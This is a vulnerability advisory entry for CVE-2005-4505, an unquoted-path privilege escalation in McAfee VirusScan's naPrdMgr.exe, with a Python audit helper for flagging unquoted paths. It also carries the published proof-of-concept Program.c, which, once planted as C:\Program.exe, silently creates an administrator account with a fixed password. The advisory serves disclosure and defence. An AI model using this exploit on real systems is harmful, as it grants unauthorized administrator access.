McAfee VirusScan Path Specification Privilege Escalation Vulnerability

Vulnerability ID 1109547 Vulnerability Type Design Error
Published 2005-12-22 Updated 2005-12-27
CVE CVE-2005-4505 CNNVD-ID CNNVD-200512-540
Platform Windows CVSS Score 7.2
|Vulnerability Source
https://www.exploit-db.com/exploits/26970
https://cxsecurity.com/issue/WLB-2005120070
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-540
|Vulnerability Details
McAfee VirusScan is a popular real-time virus protection application. McAfee VirusScan has a vulnerability in the way it handles program execution; a local attacker could exploit it to escalate privileges locally. By default the naPrdMgr.exe process in VirusScan runs under the Local System account, and its usual sequence is as follows:
- attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT
The vulnerability lies in how naPrdMgr.exe attempts to run C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE. Because the path is not quoted, naPrdMgr.exe first tries to run C:\Program.exe; if that file is not found it tries C:\Program Files\Network.exe, and only if that is also missing does it finally run the EntVUtil.EXE it originally intended. A malicious user can create an application named Program.exe and place it in the root of C:\, and naPrdMgr.exe will then run it with Local System privileges.
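The lookup order described above, as an added example that is not part of this advisory or of McAfee's code: a small Python audit helper that, given a service or launcher command line, enumerates the files Windows would probe before reaching the intended binary, so that unquoted paths like the one used by naPrdMgr.exe can be flagged during a configuration review. The sample command lines are constructed; the first one is the path from this advisory.

```python
import ntpath


def resolve_candidates(command_line: str) -> list[str]:
    """Return, in order, the files CreateProcess probes for a command line.

    For an unquoted path containing spaces, Windows tries every space-delimited
    prefix as an executable (appending .exe when the prefix has no extension)
    and runs the first file that exists, reaching the full path only last.
    A quoted path yields a single candidate: the intended binary.
    """
    cmd = command_line.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return [cmd[1:end] if end != -1 else cmd[1:]]
    tokens = cmd.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if ntpath.splitext(prefix)[1] == "":
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def hijack_points(command_line: str) -> list[str]:
    """Files that would run instead of the intended binary if they existed."""
    return resolve_candidates(command_line)[:-1]


def audit_image_paths(image_paths: list[str]) -> dict[str, list[str]]:
    """Map each ambiguous command line to the files that would preempt it."""
    return {p: hijack_points(p) for p in image_paths if hijack_points(p)}


# Constructed sample command lines; the first is the one from this advisory.
SAMPLE_IMAGE_PATHS = [
    r"C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE",
    r'"C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE"',
    r"C:\Windows\system32\svchost.exe",
]

if __name__ == "__main__":
    for path, planted in audit_image_paths(SAMPLE_IMAGE_PATHS).items():
        print(f"UNQUOTED: {path}")
        for p in planted:
            print(f"    would run first if present: {p}")
```

Each reported file must not be creatable by standard users (the default ACL on the C:\ root and on Program Files decides that), and the fix on the service side is simply to quote the image path.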
|Vulnerability EXP
source: http://www.securityfocus.com/bid/16040/info

McAfee VirusScan is prone to a vulnerability that could allow an arbitrary file to be executed.

The 'naPrdMgr.exe' process calls applications without using properly quoted paths. Successful exploitation may allow local attackers to gain elevated privileges.

McAfee VirusScan Enterprise 8.0i (patch 11) is reportedly vulnerable. Other versions may be affected as well. 

// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* system(), _MAX_PATH */

INT main( VOID )
{
    CHAR szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    /* Resolve the Windows directory so net.exe is called by full path */
    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program Pr0gr@m$$ /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators Program /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// ===== End Program.c ======
|References

Source: BID
Name: 16040
Link: http://www.securityfocus.com/bid/16040
Source: BUGTRAQ
Name: 20051222 Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
Link: http://www.securityfocus.com/archive/1/420104/100/0/threaded
Source: XF
Name: mcafee-naprdmgr-privilege-escalation(23815)
Link: http://xforce.iss.net/xforce/xfdb/23815
Source: VUPEN
Name: ADV-2005-3077
Link: http://www.frsirt.com/english/advisories/2005/3077
Source: SECTRACK
Name: 1015404
Link: http://securitytracker.com/id?1015404
Source: SREASON
Name: 292
Link: http://securityreason.com/securityalert/292
Source: MISC
Link: http://reedarvin.thearvins.com/20051222-01.html